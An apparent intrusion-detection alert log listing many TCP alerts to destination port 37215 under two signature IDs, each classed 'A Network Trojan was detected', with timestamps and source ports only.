          Timestamp:06/09/24-16:33:18.472339
          SID:2829579
          Source Port:58382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.987509
          SID:2829579
          Source Port:43048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248673
          SID:2829579
          Source Port:35494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861977
          SID:2835222
          Source Port:42694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078034
          SID:2835222
          Source Port:38614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.253150
          SID:2835222
          Source Port:58264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.281199
          SID:2829579
          Source Port:38350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946246
          SID:2829579
          Source Port:40730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230356
          SID:2829579
          Source Port:43474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.294393
          SID:2829579
          Source Port:36986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.989622
          SID:2835222
          Source Port:56912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946215
          SID:2829579
          Source Port:49234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.296539
          SID:2829579
          Source Port:44874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557685
          SID:2835222
          Source Port:35816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986456
          SID:2835222
          Source Port:42240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287956
          SID:2835222
          Source Port:55238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.596206
          SID:2835222
          Source Port:36264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.678157
          SID:2829579
          Source Port:55786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.169340
          SID:2835222
          Source Port:51006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034520
          SID:2829579
          Source Port:45822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226624
          SID:2835222
          Source Port:57006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.596969
          SID:2829579
          Source Port:48528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.289414
          SID:2829579
          Source Port:36174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288265
          SID:2829579
          Source Port:59070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159923
          SID:2835222
          Source Port:45544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399904
          SID:2829579
          Source Port:34708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399157
          SID:2835222
          Source Port:49394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226199
          SID:2835222
          Source Port:49888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034292
          SID:2829579
          Source Port:58686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.252446
          SID:2829579
          Source Port:52268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567582
          SID:2829579
          Source Port:35302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558960
          SID:2829579
          Source Port:43004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986404
          SID:2829579
          Source Port:43692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.030646
          SID:2829579
          Source Port:49290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166820
          SID:2835222
          Source Port:34548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.941956
          SID:2835222
          Source Port:55508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721554
          SID:2835222
          Source Port:42748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.917904
          SID:2835222
          Source Port:35182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033269
          SID:2829579
          Source Port:60442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.919563
          SID:2829579
          Source Port:53150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165575
          SID:2829579
          Source Port:51050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035930
          SID:2835222
          Source Port:36230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.676375
          SID:2829579
          Source Port:42496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.037726
          SID:2835222
          Source Port:54854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028793
          SID:2829579
          Source Port:38672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.100829
          SID:2829579
          Source Port:34770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162971
          SID:2835222
          Source Port:34272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.417381
          SID:2829579
          Source Port:33882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.993353
          SID:2829579
          Source Port:47366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539515
          SID:2835222
          Source Port:53184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.281051
          SID:2835222
          Source Port:50534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033351
          SID:2835222
          Source Port:52268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.079464
          SID:2835222
          Source Port:54604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.041493
          SID:2835222
          Source Port:50364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225975
          SID:2835222
          Source Port:54740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399613
          SID:2835222
          Source Port:52046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988275
          SID:2835222
          Source Port:56424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.540432
          SID:2835222
          Source Port:46382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287446
          SID:2829579
          Source Port:48772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.469833
          SID:2829579
          Source Port:49568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.998573
          SID:2829579
          Source Port:51728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.863815
          SID:2829579
          Source Port:48068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946298
          SID:2829579
          Source Port:44292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.467764
          SID:2835222
          Source Port:39458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.290518
          SID:2829579
          Source Port:51598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028911
          SID:2829579
          Source Port:59704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.295560
          SID:2835222
          Source Port:48366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945852
          SID:2829579
          Source Port:50152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.000605
          SID:2835222
          Source Port:47866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034665
          SID:2835222
          Source Port:33010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163395
          SID:2835222
          Source Port:47836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539816
          SID:2835222
          Source Port:52516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.915945
          SID:2835222
          Source Port:33682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397746
          SID:2829579
          Source Port:33190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821145
          SID:2835222
          Source Port:49262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.658421
          SID:2829579
          Source Port:55592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947710
          SID:2829579
          Source Port:52650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.989365
          SID:2829579
          Source Port:44138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.477940
          SID:2835222
          Source Port:43786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.660930
          SID:2835222
          Source Port:48046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718527
          SID:2829579
          Source Port:39934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.285438
          SID:2829579
          Source Port:51010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.651589
          SID:2835222
          Source Port:46864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.561909
          SID:2829579
          Source Port:46596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.004655
          SID:2835222
          Source Port:57102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.285663
          SID:2829579
          Source Port:41182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396071
          SID:2829579
          Source Port:33294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945150
          SID:2829579
          Source Port:34766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.471145
          SID:2829579
          Source Port:40966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.916740
          SID:2829579
          Source Port:53736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.245532
          SID:2829579
          Source Port:41698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.032010
          SID:2835222
          Source Port:38724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823390
          SID:2835222
          Source Port:42908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.273715
          SID:2829579
          Source Port:47544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102196
          SID:2835222
          Source Port:43290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.274656
          SID:2835222
          Source Port:58084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869384
          SID:2835222
          Source Port:44628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.899222
          SID:2835222
          Source Port:40252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396153
          SID:2835222
          Source Port:35718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538288
          SID:2829579
          Source Port:44730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077795
          SID:2829579
          Source Port:45140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.296503
          SID:2835222
          Source Port:39448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.993303
          SID:2835222
          Source Port:53396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223890
          SID:2829579
          Source Port:58368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823153
          SID:2829579
          Source Port:42962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.036708
          SID:2835222
          Source Port:51544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716798
          SID:2835222
          Source Port:57746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.288335
          SID:2835222
          Source Port:34624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414282
          SID:2835222
          Source Port:48692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.870613
          SID:2835222
          Source Port:60104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160951
          SID:2829579
          Source Port:54962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.684891
          SID:2835222
          Source Port:43054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082296
          SID:2829579
          Source Port:53212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644968
          SID:2835222
          Source Port:58134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.892903
          SID:2829579
          Source Port:33084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822855
          SID:2835222
          Source Port:47444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.993603
          SID:2829579
          Source Port:51480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.596838
          SID:2835222
          Source Port:55956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080402
          SID:2829579
          Source Port:50412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.037261
          SID:2829579
          Source Port:41048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.467133
          SID:2829579
          Source Port:52194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.292915
          SID:2835222
          Source Port:59048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.169395
          SID:2835222
          Source Port:53252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.563344
          SID:2829579
          Source Port:50164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.724197
          SID:2835222
          Source Port:48096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413935
          SID:2829579
          Source Port:42348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.866018
          SID:2835222
          Source Port:58726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466929
          SID:2829579
          Source Port:36356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644842
          SID:2829579
          Source Port:53572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102267
          SID:2829579
          Source Port:43582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.242697
          SID:2835222
          Source Port:56348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.026893
          SID:2835222
          Source Port:50492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.895778
          SID:2835222
          Source Port:53642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.162001
          SID:2835222
          Source Port:59140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082226
          SID:2835222
          Source Port:58862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.302519
          SID:2829579
          Source Port:55228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867382
          SID:2835222
          Source Port:42374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.395789
          SID:2835222
          Source Port:51440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.036066
          SID:2829579
          Source Port:53742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224393
          SID:2835222
          Source Port:48186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.357546
          SID:2835222
          Source Port:36794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160975
          SID:2829579
          Source Port:53394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.302497
          SID:2829579
          Source Port:43654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165923
          SID:2829579
          Source Port:41826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.161309
          SID:2829579
          Source Port:37808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.282033
          SID:2835222
          Source Port:38918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558890
          SID:2835222
          Source Port:54042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.563148
          SID:2829579
          Source Port:53046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.252376
          SID:2835222
          Source Port:43116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.605959
          SID:2829579
          Source Port:38226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869311
          SID:2829579
          Source Port:34082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288056
          SID:2829579
          Source Port:42026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.909378
          SID:2829579
          Source Port:58122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.036641
          SID:2835222
          Source Port:44364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.990845
          SID:2829579
          Source Port:44108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.134214
          SID:2835222
          Source Port:39474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865290
          SID:2829579
          Source Port:35554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080901
          SID:2835222
          Source Port:37316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929995
          SID:2835222
          Source Port:45602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.905494
          SID:2835222
          Source Port:37678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.130076
          SID:2835222
          Source Port:50506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.677261
          SID:2829579
          Source Port:59914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230433
          SID:2835222
          Source Port:51040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718561
          SID:2835222
          Source Port:52364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947061
          SID:2835222
          Source Port:58094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538349
          SID:2829579
          Source Port:49846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.989445
          SID:2835222
          Source Port:56844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.595616
          SID:2835222
          Source Port:44334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.566408
          SID:2835222
          Source Port:53184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.305168
          SID:2835222
          Source Port:47834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.302382
          SID:2829579
          Source Port:58022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034907
          SID:2829579
          Source Port:54908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.598257
          SID:2829579
          Source Port:43780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.475803
          SID:2835222
          Source Port:35480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.918167
          SID:2835222
          Source Port:45162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164765
          SID:2835222
          Source Port:43768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168841
          SID:2835222
          Source Port:43998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.477917
          SID:2829579
          Source Port:55492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820876
          SID:2835222
          Source Port:44394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.914765
          SID:2835222
          Source Port:46410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.244877
          SID:2829579
          Source Port:54906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286725
          SID:2835222
          Source Port:39822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.478699
          SID:2829579
          Source Port:50760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867984
          SID:2829579
          Source Port:54474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644316
          SID:2835222
          Source Port:48636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945811
          SID:2829579
          Source Port:57378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.399057
          SID:2835222
          Source Port:40048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715519
          SID:2835222
          Source Port:47794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.249563
          SID:2835222
          Source Port:50002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227602
          SID:2835222
          Source Port:49686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.164365
          SID:2835222
          Source Port:59382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.646112
          SID:2829579
          Source Port:45420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.868867
          SID:2829579
          Source Port:58410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081954
          SID:2829579
          Source Port:56352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166438
          SID:2829579
          Source Port:51002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.918954
          SID:2829579
          Source Port:45340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.601840
          SID:2835222
          Source Port:58880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.036077
